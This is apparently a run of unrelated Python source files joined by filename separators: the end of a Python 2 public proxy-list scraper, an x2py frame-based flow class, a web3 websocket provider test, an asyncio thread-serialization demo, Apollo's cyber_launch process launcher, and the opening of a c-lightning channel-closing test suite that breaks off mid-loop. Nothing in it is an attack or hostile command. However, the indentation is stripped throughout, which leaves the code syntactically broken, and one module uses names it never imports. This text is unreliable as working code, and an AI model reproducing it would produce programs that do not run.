workerQueue.put(templs[i] + ":" + templs2[i])
# bug("proxylisty() " + templs[i] + ":" + templs2[i])
except Exception, e:
if e.message == " ":
print ''
else:
print e.message
print "Failed to grab " + "'" + url + "'"
def nntime():
print "\nGrabbing: http://nntime.com/"
primary_url = "http://nntime.com/proxy-list-00.htm"
urls = []
for i in range(1, 31):
if i < 10:
urls.append(primary_url.replace("00", "0" + str(i)))
else:
urls.append(primary_url.replace("00", str(i)))
for url in urls:
try:
response = urllib.urlopen(url)
html = response.read()
decoder_string = re.findall(r'<script type="text/javascript">\n(.*?)</script>', html)
decoderls = decoder_string[0].split(";")
temp_tuple = []
for itm in decoderls:
if itm:
temp_tuple.append((itm.split("=")))
decoder_dict = dict(temp_tuple)
ips = re.findall(r'></td><td>(.*?)<script type="text/javascript">document', html)
ports = []
templs = re.findall(r'<script type="text/javascript">.*?</script>', html)
for line in templs:
temp = line.replace('<script type="text/javascript">document.write(":"+', '')
temp = temp.replace(')</script>', '')
codes = temp.split("+")
temp_port = ""
for code in codes:
temp_port += decoder_dict[code]
ports.append(temp_port)
for i in range(len(ips)):
#print ips[i] + ":" + ports[i]
workerQueue.put(ips[i] + ":" + ports[i])
except Exception, e:
if e.message == " ":
print ''
else:
print e.message
print "Failed to grab " + "'" + url + "'"
def aliveproxy():
print "\nGrabbing: http://www.aliveproxy.com/"
urls = []
url = "http://www.aliveproxy.com/"
response = urllib.urlopen(url)
html = response.read()
pos = html.find("Socks 5")
html = html[:pos]
temp_urls = re.findall(r'href=[\'"]?([^\'" >]+)', html)
for itm in temp_urls:
if "http://www.aliveproxy.com/proxy-list/proxies.aspx/" in itm:
urls.append(itm)
for url in urls:
response = urllib.urlopen(url)
html = response.read()
templs = re.findall(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}):(\d{1,5})', html)
for itm in templs:
workerQueue.put(itm[0] + ":" + itm[1])
#============================================================================================
if __name__ == "__main__":
print "==========================="
print "Starting Proxy Scraper..."
print "==========================="
proxyCount = 0
workerQueue = Queue.Queue()
pQueueThread = threading.Thread(target=queueThread)
pQueueThread.setDaemon(True)
pProxylist = threading.Thread(target=proxylist)
pProxylist.setDaemon(True)
pUsproxy = threading.Thread(target=usproxy)
pUsproxy.setDaemon(True)
pFreeproxylist = threading.Thread(target=freeproxylist)
pFreeproxylist.setDaemon(True)
pCoolproxy = threading.Thread(target=coolproxy)
pCoolproxy.setDaemon(True)
pSamair = threading.Thread(target=samair)
pSamair.setDaemon(True)
#pProxylisty = threading.Thread(target=proxylisty)
#pProxylisty.setDaemon(True)
pAliveproxy = threading.Thread(target=aliveproxy)
pAliveproxy.setDaemon(True)
pNntime = threading.Thread(target=nntime)
pNntime.setDaemon(True)
print "All threads set, starting threads..."
pProxylist.start()
time.sleep(2)
pUsproxy.start()
time.sleep(2)
pFreeproxylist.start()
time.sleep(2)
pCoolproxy.start()
time.sleep(2)
pSamair.start()
time.sleep(2)
#pProxylisty.start()
#time.sleep(2)
pAliveproxy.start()
pNntime.start()
time.sleep(2)
print "Fetching data..."
print "\nPlease wait..."
print "\nIf it takes too long, try pressing enter, it may trigger the program to finish."
pProxylist.join()
pUsproxy.join()
pFreeproxylist.join()
pCoolproxy.join()
pSamair.join()
#pProxylist.join()
pAliveproxy.join()
pNntime.join()
if not workerQueue.empty():
pQueueThread.start()
pQueueThread.join()
print "Saved to file!\n"
print "Proxies found: " + str(proxyCount)
else:
print "Could not scrape any proxies!"
raw_input("\nPress any key to exit...")
sys.exit()
print "Finish!"
|
frame_based_flow.py
|
# Copyright (c) 2017, 2018 Jae-jun Kang
# See the file LICENSE for details.
import sys
import time
from threading import Lock, Thread
from x2py.event import Event
from x2py.event_queue import EventQueue
from x2py.flow import Flow
from x2py.util.atomic import AtomicInt
from x2py.util.trace import Trace
class Time(object):
"""Utility class to handle time information within a frame-based flow."""
    # time.clock was deprecated in 3.3 and removed in 3.8
if sys.version_info >= (3, 3):
clock = time.perf_counter
else:
clock = time.clock
def __init__(self):
pass
def init(self):
self.start_clock = Time.clock()
self.last_clock = self.start_clock
self.current_clock = self.last_clock
self.delta_clock = 0.0
def before_update(self):
self.current_clock = Time.clock()
self.delta_clock = self.current_clock - self.last_clock
def after_update(self):
self.last_clock = self.current_clock
class FrameBasedFlow(Flow):
"""Abstract base class for frame-based (looping) execution flows."""
def __init__(self, name=None, with_queue=False):
super(FrameBasedFlow, self).__init__(name)
self.queue = None
if with_queue:
self.queue = EventQueue()
self._lock = Lock()
self.should_stop = AtomicInt()
self.thread = None
# Default resolution is 15.625ms (64 frame/sec)
self.resolution = 0.015625
self.time = Time()
def feed(self, event):
if self.queue is None:
return
if event is None or not isinstance(event, Event):
raise TypeError()
self.queue.enqueue(event)
def start(self):
with self._lock:
if self.thread is not None:
return
self._setup()
self.cases.setup_with(self)
self.thread = Thread(target=self)
if self.name is not None:
self.thread.setName(self.name)
self.thread.start()
if self.queue is not None:
self.queue.enqueue(FlowStart())
def stop(self):
with self._lock:
if self.thread is None:
return
self.should_stop.value = 1
if self.queue is not None:
self.queue.close(FlowStop())
self.thread.join()
self.thread = None
self.cases.teardown_with(self)
self._teardown()
def __call__(self):
Flow.thread_local.current = self
if self.queue is not None:
Flow.thread_local.event_proxy = EventProxy()
Flow.thread_local.handler_chain = []
self._begin()
while self.should_stop.value == 0:
self._update()
if self.queue is not None:
while (Time.clock() - self.time.current_clock) < self.resolution:
event = self.queue.try_dequeue()
if event is not None:
self.dispatch(event)
if event.type_id() == BuiltinEventType.FLOW_STOP:
self.should_stop.value = 1
break
else:
if self.should_stop.value != 0:
break
else:
time.sleep(0.001)
continue
else:
clock_delta = Time.clock() - self.time.current_clock
if clock_delta < self.resolution:
delay = self.resolution - clock_delta
else:
delay = 0.0
time.sleep(delay)
self.end()
if self.queue is not None:
Flow.thread_local.handler_chain = None
Flow.thread_local.event_proxy = None
Flow.thread_local.current = None
def _begin(self):
self.time.init()
self.begin()
def _update(self):
self.time.before_update()
self.update()
self.time.after_update()
def begin(self):
pass
def end(self):
pass
def update(self):
raise NotImplementedError()
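if __name__ == "__main__":
    # Hedged usage sketch (added for illustration, not part of the original module): exercise the
    # Time helper on its own to show how delta_clock is measured around simulated frame work.
    t = Time()
    t.init()
    t.before_update()   # first frame: delta_clock is ~0
    t.after_update()
    time.sleep(0.05)    # simulated per-frame work
    t.before_update()   # second frame: delta_clock is ~0.05s
    print("delta between frames: {:.4f}s".format(t.delta_clock))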
|
test_websocket_provider.py
|
import asyncio
from concurrent.futures import (
TimeoutError,
)
import pytest
from threading import (
Thread,
)
import websockets
from tests.utils import (
wait_for_ws,
)
from web3 import Web3
from web3.exceptions import (
ValidationError,
)
from web3.providers.websocket import (
WebsocketProvider,
)
@pytest.yield_fixture
def start_websocket_server(open_port):
event_loop = asyncio.new_event_loop()
def run_server():
async def empty_server(websocket, path):
data = await websocket.recv()
await asyncio.sleep(0.02)
await websocket.send(data)
server = websockets.serve(empty_server, '127.0.0.1', open_port, loop=event_loop)
event_loop.run_until_complete(server)
event_loop.run_forever()
thd = Thread(target=run_server)
thd.start()
try:
yield
finally:
event_loop.call_soon_threadsafe(event_loop.stop)
@pytest.fixture()
def w3(open_port, start_websocket_server):
# need new event loop as the one used by server is already running
event_loop = asyncio.new_event_loop()
endpoint_uri = 'ws://127.0.0.1:{}'.format(open_port)
event_loop.run_until_complete(wait_for_ws(endpoint_uri, event_loop))
provider = WebsocketProvider(endpoint_uri, websocket_timeout=0.01)
return Web3(provider)
def test_websocket_provider_timeout(w3):
with pytest.raises(TimeoutError):
w3.vns.accounts
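# Note: the timeout above is reliable because the echo server sleeps 0.02s per
# message while the provider is constructed with websocket_timeout=0.01.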
def test_restricted_websocket_kwargs():
invalid_kwargs = {'uri': 'ws://127.0.0.1:8546'}
re_exc_message = r'.*found: {0}*'.format(set(invalid_kwargs.keys()))
with pytest.raises(ValidationError, match=re_exc_message):
WebsocketProvider(websocket_kwargs=invalid_kwargs)
|
custom_loop.py
|
import asyncio
import logging
import threading
import time
from concurrent.futures import ThreadPoolExecutor
# Logging setup
class AsyncioLoggingFilter(logging.Filter):
def filter(self, record):
task = asyncio.Task.current_task()
record.task = f'[task {id(task)}]' if task else '[NOLOOP ]'
return True
logger = logging.getLogger(__name__)
logger.addFilter(AsyncioLoggingFilter())
logging.getLogger('asyncio').setLevel(logging.CRITICAL)
logging.basicConfig(level=logging.INFO, format="%(msecs)f %(threadName)s %(task)s %(msg)s")
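# ThreadSerializedTask serializes coroutine steps across threads by overriding
# the (internal, version-dependent) Task._wakeup hook: the class-level lock is
# held while a task advances to its next await, so only one event loop/thread
# runs a task step at a time and the log lines in two() should not interleave
# between threads.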
class ThreadSerializedTask(asyncio.Task):
_lock = threading.Lock()
def _wakeup(self, *args, **kwargs):
logger.debug("Acquire lock")
ThreadSerializedTask._lock.acquire()
super()._wakeup(*args, **kwargs)
logger.debug("Releasing lock")
ThreadSerializedTask._lock.release()
def task_factory(loop, coro):
return ThreadSerializedTask(coro, loop=loop)
async def one():
await asyncio.sleep(0.01)
logger.debug("-> One")
await two()
await asyncio.sleep(0.01)
logger.debug("-> Exiting one")
async def two():
await asyncio.sleep(0.01)
logger.info("--> Should not be interleaved with other threads")
time.sleep(0.01)
logger.info("--> Should not be interleaved with other threads")
time.sleep(0.01)
logger.info("--> Should not be interleaved with other threads")
def run_loop():
loop = asyncio.new_event_loop()
loop.set_task_factory(task_factory)
loop.run_until_complete(one())
if __name__ == '__main__':
threads = []
for _ in range(0, 5):
thread = threading.Thread(target=run_loop)
thread.start()
threads.append(thread)
[t.join() for t in threads]
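# For comparison (hypothetical): with the default task factory (i.e. without
# loop.set_task_factory(task_factory)), the five threads advance their
# coroutines independently, so the "Should not be interleaved" lines from
# different threads can interleave freely.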
|
cyber_launch.py
|
#!/usr/bin/env python3
# ****************************************************************************
# Copyright 2018 The Apollo Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ****************************************************************************
import argparse
import atexit
import logging
import os
import os.path
import signal
import subprocess
import sys
import time
import threading
import traceback
import xml.etree.ElementTree as ET
g_binary_name = 'mainboard'
g_pwd = os.getcwd()
g_script_name = os.path.basename(sys.argv[0]).split(".")[0]
g_process_pid = os.getpid()
g_process_name = g_script_name + "_" + str(g_process_pid)
cyber_path = os.getenv('CYBER_PATH')
"""
colorful logging
"""
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = list(range(8))
RESET_SEQ = "\033[0m"
COLOR_SEQ = "\033[1;%dm"
BOLD_SEQ = "\033[1m"
COLORS = {
'INFO': GREEN,
'WARNING': YELLOW,
'DEBUG': BLUE,
'ERROR': RED,
'CRITICAL': YELLOW
}
class ColoredFormatter(logging.Formatter):
def __init__(self, msg):
logging.Formatter.__init__(self, msg)
def format(self, record):
levelname = record.levelname
if levelname in COLORS:
if levelname == 'DEBUG':
record.levelname = COLOR_SEQ % (30 + COLORS[levelname]) + \
record.msg.split('#')[0] + RESET_SEQ
record.msg = COLOR_SEQ % (30 + COLORS[levelname]) + \
record.msg.split('#')[-1] + RESET_SEQ
else:
record.levelname = COLOR_SEQ % (30 + COLORS[levelname]) + \
g_process_name + RESET_SEQ
record.msg = COLOR_SEQ % (30 + COLORS[levelname]) + levelname + \
" " + record.msg.split('#')[-1] + RESET_SEQ
return logging.Formatter.format(self, record)
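# Formatting convention used with module_monitor() below: child-process output
# is logged at DEBUG as '<module name># <line>', so the DEBUG branch above
# splits on '#' to show the module name in the levelname column and the raw
# line as the message.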
color_formatter = ColoredFormatter("[%(levelname)-18s] %(message)s")
console = logging.StreamHandler()
console.setFormatter(color_formatter)
logger = logging.Logger(__name__)
logger.addHandler(console)
def exit_handler():
stop()
os.chdir(g_pwd)
logger.info('cyber_launch exit.')
atexit.register(exit_handler)
def singleton(cls):
instances = {}
def getinstance(*args, **kwargs):
if cls not in instances:
instances[cls] = cls(*args, **kwargs)
return instances[cls]
return getinstance
def module_monitor(mod):
while True:
line = mod.popen.stdout.readline()
if line:
logger.debug('%s# %s' % (mod.name, line.decode('utf8').strip('\n')))
continue
time.sleep(0.01)
class ProcessWrapper(object):
def __init__(self, binary_path, dag_num, dag_list, process_name,
process_type, sched_name, exception_handler=''):
self.time_of_death = None
self.started = False
self.binary_path = binary_path
self.dag_num = dag_num
self.dag_list = dag_list
self.name = process_name
self.sched_name = sched_name
self.process_type = process_type
self.popen = None
self.exit_code = None
self.args = []
self.pid = -1
self.exception_handler = exception_handler
def wait(self):
if self.started:
self.popen.wait()
def start(self):
"""
Start the wrapped process (mainboard for library modules, or the given binary command)
"""
if self.process_type == 'binary':
args_list = self.name.split()
else:
args_list = [self.binary_path]
for i in self.dag_list:
args_list.append('-d')
args_list.append(i)
if len(self.name) != 0:
args_list.append('-p')
args_list.append(self.name)
if len(self.sched_name) != 0:
args_list.append('-s')
args_list.append(self.sched_name)
self.args = args_list
try:
self.popen = subprocess.Popen(args_list, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
except Exception as err:
logger.error('Subprocess Popen exception: ' + str(err))
return 2
else:
if self.popen.pid == 0 or self.popen.returncode is not None:
logger.error('Start process [%s] failed.' % self.name)
return 2
th = threading.Thread(target=module_monitor, args=(self, ))
th.setDaemon(True)
th.start()
self.started = True
self.pid = self.popen.pid
logger.info('Start process [%s] successfully. pid: %d' %
(self.name, self.popen.pid))
logger.info('-' * 120)
return 0
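# For a 'library' module the command line built above looks like (illustrative):
#   mainboard -d <dag_conf> [-d <dag_conf> ...] -p <process_name> -s <sched_name>
# For a 'binary' module, self.name itself is split into the command to execute.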
def is_alive(self):
"""
Check whether the process is still running
@return: True if process is still running
@rtype: bool
"""
if not self.started:
return False
if self.popen is None:
if self.time_of_death is None:
self.time_of_death = time.time()
return False
self.exit_code = self.popen.poll()
if self.exit_code is not None:
if self.time_of_death is None:
self.time_of_death = time.time()
return False
return True
def get_exit_state(self):
"""
@return: description of exit state
@rtype: str
"""
if self.popen.returncode is None:
pass
elif self.popen.returncode != 0:
output = 'Process [%s] has died [pid %s, exit code %s, cmd %s].' % \
(self.name, self.pid, self.exit_code, ' '.join(self.args))
logger.error(output)
else:
output = 'Process [%s] has finished. [pid %s, cmd %s].' % \
(self.name, self.pid, ' '.join(self.args))
logger.error(output)
@singleton
class ProcessMonitor(object):
def __init__(self):
self.procs = []
self.dead_cnt = 0
self.done = False
self.is_shutdown = False
def register(self, p):
"""
Register process with L{ProcessMonitor}
@param p: Process
@type p: L{Process}
"""
if self.has_process(p.name):
logger.error(
'Cannot add process due to duplicate name "%s".' % p.name)
elif self.is_shutdown:
logger.error(
'Cannot add process [%s] due to monitor has been stopped.' % p.name)
else:
self.procs.append(p)
def has_process(self, name):
"""
@return: True if a process with the given name is being monitored;
False if it has died or was never registered with the monitor
@rtype: bool
"""
return len([p for p in self.procs if p.name == name]) > 0
def check_cleanup(self):
"""
Check whether registered processes are alive, and clean up dead ones
"""
dead_cnt = 0
for pw in self.procs:
if self.is_shutdown:
break
if pw.process_type == 'binary':
continue
try:
if not pw.is_alive():
if pw.exception_handler == "respawn":
logger.warning(
'child process [%s][%d] exit, respawn!' % (pw.name, pw.pid))
result = pw.start()
if result != 0:
logger.error(
'respawn process [%s] failed, stop all!' % (pw.name))
stop()
elif pw.exception_handler == "exit":
logger.warning(
'child process [%s][%d] exit, stop all' % (pw.name, pw.pid))
stop()
dead_cnt += 1
except Exception:
dead_cnt += 1
traceback.print_exc()
if dead_cnt > 0:
self.dead_cnt = dead_cnt
if self.dead_cnt == len(self.procs):
self.is_shutdown = True
def run(self):
"""
Run the process monitor until all processes have died.
"""
while not self.is_shutdown:
self.check_cleanup()
time.sleep(0.2)
for p in self.procs:
p.get_exit_state()
if self.dead_cnt == len(self.procs):
logger.info("All processes has died.")
return True
return False
def stop(self, signal):
"""
Stop all processes in monitor
"""
for p in self.procs:
if p.is_alive():
p.popen.send_signal(signal)
for p in self.procs:
if p.is_alive():
logger.warning('Waiting for [%s][%s] exit.' % (p.name, p.pid))
p.wait()
logger.info(
'Process [%s] has been stopped. dag_file: %s' % (p.name, p.dag_list))
# Reset members
self.procs = []
self.dead_cnt = 0
def start(launch_file=''):
"""
Start all modules in xml config
"""
pmon = ProcessMonitor()
# Find launch file
if launch_file[0] == '/':
launch_file = launch_file
elif launch_file == os.path.basename(launch_file):
launch_file = os.path.join(cyber_path, 'launch', launch_file)
else:
if os.path.exists(os.path.join(g_pwd, launch_file)):
launch_file = os.path.join(g_pwd, launch_file)
else:
logger.error('Cannot find launch file: %s ' % launch_file)
sys.exit(1)
logger.info('Launch file [%s]' % launch_file)
logger.info('=' * 120)
if not os.path.isfile(launch_file):
logger.error('Launch xml file %s does not exist' % launch_file)
sys.exit(1)
try:
tree = ET.parse(launch_file)
except Exception:
logger.error('Failed to parse launch file: invalid XML!')
sys.exit(1)
total_dag_num = 0
dictionary = {}
dag_dict = {}
root1 = tree.getroot()
for module in root1.findall('module'):
process_name = module.find('process_name').text
process_type = module.find('type')
if process_type is None:
process_type = 'library'
else:
process_type = process_type.text
if process_type is None:
process_type = 'library'
process_type = process_type.strip()
if process_type != 'binary':
dag_list = []
for dag_conf in module.findall('dag_conf'):
if dag_conf.text is None:
continue
dag = dag_conf.text.strip()
if len(dag) > 0:
dag_list.append(dag)
if len(dag_list) == 0:
logger.error('Library dag conf is null')
continue
else:
total_dag_num += len(dag_list)
if process_name is None:
process_name = 'mainboard_default_' + str(os.getpid())
process_name = process_name.strip()
if str(process_name) in dictionary:
dictionary[str(process_name)] += 1
else:
dictionary[str(process_name)] = 1
if str(process_name) not in dag_dict:
dag_dict[str(process_name)] = dag_list
else:
dag_dict[str(process_name)].extend(dag_list)
process_list = []
root = tree.getroot()
for env in root.findall('environment'):
for var in env:
os.environ[var.tag] = str(var.text)
for module in root.findall('module'):
module_name = module.find('name').text
dag_conf = module.find('dag_conf').text
process_name = module.find('process_name').text
sched_name = module.find('sched_name')
process_type = module.find('type')
exception_handler = module.find('exception_handler')
if process_type is None:
process_type = 'library'
else:
process_type = process_type.text
if process_type is None:
process_type = 'library'
process_type = process_type.strip()
if sched_name is None:
sched_name = "CYBER_DEFAULT"
else:
sched_name = sched_name.text
if process_name is None:
process_name = 'mainboard_default_' + str(os.getpid())
dag_list = []
for dag_conf in module.findall('dag_conf'):
if dag_conf.text is None:
continue
dag = dag_conf.text.strip()
if len(dag) > 0:
dag_list.append(dag)
if module_name is None:
module_name = ''
if exception_handler is None:
exception_handler = ''
else:
exception_handler = exception_handler.text
module_name = module_name.strip()
process_name = process_name.strip()
sched_name = sched_name.strip()
exception_handler = exception_handler.strip()
logger.info('Load module [%s] %s: [%s] [%s] conf: [%s] exception_handler: [%s]' %
(module_name, process_type, process_name, sched_name, ', '.join(dag_list),
exception_handler))
if process_name not in process_list:
if process_type == 'binary':
if len(process_name) == 0:
logger.error(
'Start binary failed. Binary process_name is null.')
continue
pw = ProcessWrapper(
process_name.split()[0], 0, [
""], process_name, process_type,
exception_handler)
# Default is library
else:
pw = ProcessWrapper(
g_binary_name, 0, dag_dict[
str(process_name)], process_name,
process_type, sched_name, exception_handler)
result = pw.start()
if result != 0:
logger.error(
'Start manager [%s] failed. Stop all!' % process_name)
stop()
pmon.register(pw)
process_list.append(process_name)
# No module in xml
if not process_list:
logger.error("No module was found in xml config.")
return
all_died = pmon.run()
if not all_died:
logger.info("Stop all processes...")
stop()
logger.info("Cyber exit.")
def stop(sig=signal.SIGINT):
"""
stop all modules
"""
pmon = ProcessMonitor()
if len(pmon.procs) == 0:
return
pmon.stop(sig)
logger.info('All processes have been stopped.')
sys.exit(0)
def stop_launch(launch_file):
"""
Stop the launch file
"""
if not launch_file:
cmd = 'pkill -INT cyber_launch'
else:
cmd = 'pkill -INT -f ' + launch_file
os.system(cmd)
time.sleep(3)
logger.info('Stop cyber launch finished.')
sys.exit(0)
def signal_handler(sig, frame):
logger.info('Keyboard interrupt received. Stop all processes.')
stop(sig)
def main():
"""
Main function
"""
if cyber_path is None:
logger.error(
'Error: environment variable CYBER_PATH not found, set environment first.')
sys.exit(1)
os.chdir(cyber_path)
parser = argparse.ArgumentParser(description='cyber launcher')
subparsers = parser.add_subparsers(help='sub-command help')
start_parser = subparsers.add_parser(
'start', help='launch/benchmark.launch')
start_parser.add_argument('file', nargs='?', action='store',
help='launch file, default is cyber.launch')
stop_parser = subparsers.add_parser(
'stop', help='stop all the module in launch file')
stop_parser.add_argument('file', nargs='?', action='store',
help='launch file, default stop all the launcher')
# restart_parser = subparsers.add_parser('restart', help='restart the module')
# restart_parser.add_argument('file', nargs='?', action='store', help='launch file,
# default is cyber.launch')
params = parser.parse_args(sys.argv[1:])
command = sys.argv[1]
if command == 'start':
start(params.file)
elif command == 'stop':
stop_launch(params.file)
# elif command == 'restart':
# restart(params.file)
else:
logger.error('Invalid command %s' % command)
sys.exit(1)
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
main()
|
test_closing.py
|
from fixtures import * # noqa: F401,F403
from lightning import RpcError
from utils import only_one, sync_blockheight, wait_for, DEVELOPER, TIMEOUT, VALGRIND, SLOW_MACHINE
import queue
import pytest
import re
import threading
import unittest
@unittest.skipIf(not DEVELOPER, "Too slow without --dev-bitcoind-poll")
def test_closing(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2)
chan = l1.get_channel_scid(l2)
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
bitcoind.generate_block(5)
# Only wait for the channels to activate with DEVELOPER=1,
# otherwise it's going to take too long because of the missing
# --dev-broadcast-interval
if DEVELOPER:
wait_for(lambda: len(l1.getactivechannels()) == 2)
wait_for(lambda: len(l2.getactivechannels()) == 2)
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
# This may either be from a local_update or an announce, so just
# check for the substring
assert 'CHANNELD_NORMAL:Funding transaction locked.' in billboard[0]
# This should return with an error, then close.
with pytest.raises(RpcError, match=r'Channel close negotiation not finished'):
l1.rpc.close(chan, False, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: len(l2.getactivechannels()) == 0)
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(bitcoind.rpc.getrawmempool(False))
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of 5430 satoshi']
bitcoind.generate_block(1)
l1.daemon.wait_for_log(r'Owning output .* txid %s' % closetxid)
l2.daemon.wait_for_log(r'Owning output .* txid %s' % closetxid)
# Make sure both nodes have grabbed their close tx funds
assert closetxid in set([o['txid'] for o in l1.rpc.listfunds()['outputs']])
assert closetxid in set([o['txid'] for o in l2.rpc.listfunds()['outputs']])
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of 5430 satoshi',
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'
])
bitcoind.generate_block(9)
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of 5430 satoshi',
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 90 more blocks before forgetting channel'
])
# Make sure both have forgotten about it
bitcoind.generate_block(90)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_while_disconnected(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2, opts={'may_reconnect': True})
chan = l1.get_channel_scid(l2)
l1.pay(l2, 200000000)
l2.stop()
# The close should still be triggered afterwards.
with pytest.raises(RpcError, match=r'Channel close negotiation not finished'):
l1.rpc.close(chan, False, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.start()
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(101)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_id(node_factory):
"""Test closing using peer ID and full channel ID
"""
l1, l2 = node_factory.get_nodes(2)
# Close by full channel ID.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
cid = l2.rpc.listpeers()['peers'][0]['channels'][0]['channel_id']
l2.rpc.close(cid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
# Close by peer ID.
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.daemon.wait_for_log("Handed peer, entering loop")
l2.fund_channel(l1, 10**6)
pid = l1.info['id']
l2.rpc.close(pid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
@unittest.skipIf(not DEVELOPER, "needs dev-rescan-outputs")
def test_closing_torture(node_factory, executor, bitcoind):
l1, l2 = node_factory.get_nodes(2)
amount = 10**6
# Before the fix was applied, 15 would often pass.
# However, increasing the number of tries would
# take longer in VALGRIND mode, triggering a CI
# failure since the test does not print any
# output.
# On my laptop, VALGRIND is about 4x slower than native, hence
# the approximations below:
iterations = 50
if VALGRIND:
iterations //= 4
if SLOW_MACHINE:
iterations //= 2
for i in range(iterations):
# Reduce probability that spurious sendrawtx error will occur
l1.rpc.dev_rescan_outputs()
# Create a channel.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, amount)
scid = l1.get_channel_scid(l2)
# Get it confirmed.
l1.bitcoin.generate_block(6)
# Wait for it to go to CHANNELD_NORMAL
l1.wait_channel_active(scid)
l2.wait_channel_active(scid)
# Start closers: can take a long time under valgrind!
c1 = executor.submit(l1.rpc.close, l2.info['id'], False, 60)
c2 = executor.submit(l2.rpc.close, l1.info['id'], False, 60)
# Wait for close to finish
c1.result(TIMEOUT)
c2.result(TIMEOUT)
wait_for(lambda: len(bitcoind.rpc.getrawmempool(False)) == 1)
# Get close confirmed
l1.bitcoin.generate_block(100)
wait_for(lambda: len(l1.rpc.listpeers()['peers']) == 0)
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
@unittest.skipIf(not DEVELOPER, "needs dev-override-feerates")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_closing_different_fees(node_factory, bitcoind, executor):
l1 = node_factory.get_node()
# Default feerate = 15000/7500/1000
# It will start at the second number, accepting anything above the first.
feerates = [[20000, 15000, 7400], [8000, 1001, 100]]
amounts = [0, 545999, 546000]
num_peers = len(feerates) * len(amounts)
addr = l1.rpc.newaddr()['address']
bitcoind.rpc.sendtoaddress(addr, 1)
numfunds = len(l1.rpc.listfunds()['outputs'])
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) > numfunds)
# Create them in a batch, for speed!
peers = []
for feerate in feerates:
for amount in amounts:
p = node_factory.get_node(feerates=feerate)
p.feerate = feerate
p.amount = amount
l1.rpc.connect(p.info['id'], 'localhost', p.port)
peers.append(p)
for p in peers:
p.channel = l1.rpc.fundchannel(p.info['id'], 10**6)['channel_id']
# Technically, this is async to fundchannel returning.
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(6)
# Now wait for them all to hit normal state, do payments
l1.daemon.wait_for_logs(['update for channel .* now ACTIVE'] * num_peers
+ ['to CHANNELD_NORMAL'] * num_peers)
for p in peers:
if p.amount != 0:
l1.pay(p, 100000000)
# Now close all channels
# All closes occur in parallel, and on Travis,
# ALL those lightningd are running on a single core,
# so increase the timeout so that this test will pass
# when valgrind is enabled.
# (close timeout defaults to 30 as of this writing)
closes = [executor.submit(l1.rpc.close, p.channel, False, 90) for p in peers]
for c in closes:
c.result(90)
# close does *not* wait for the sendrawtransaction, so do that!
# Note that since they disagree on the ideal fee, they may conflict
# (first one in will win), so we cannot look at logs, we need to
# wait for mempool.
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == num_peers)
bitcoind.generate_block(1)
for p in peers:
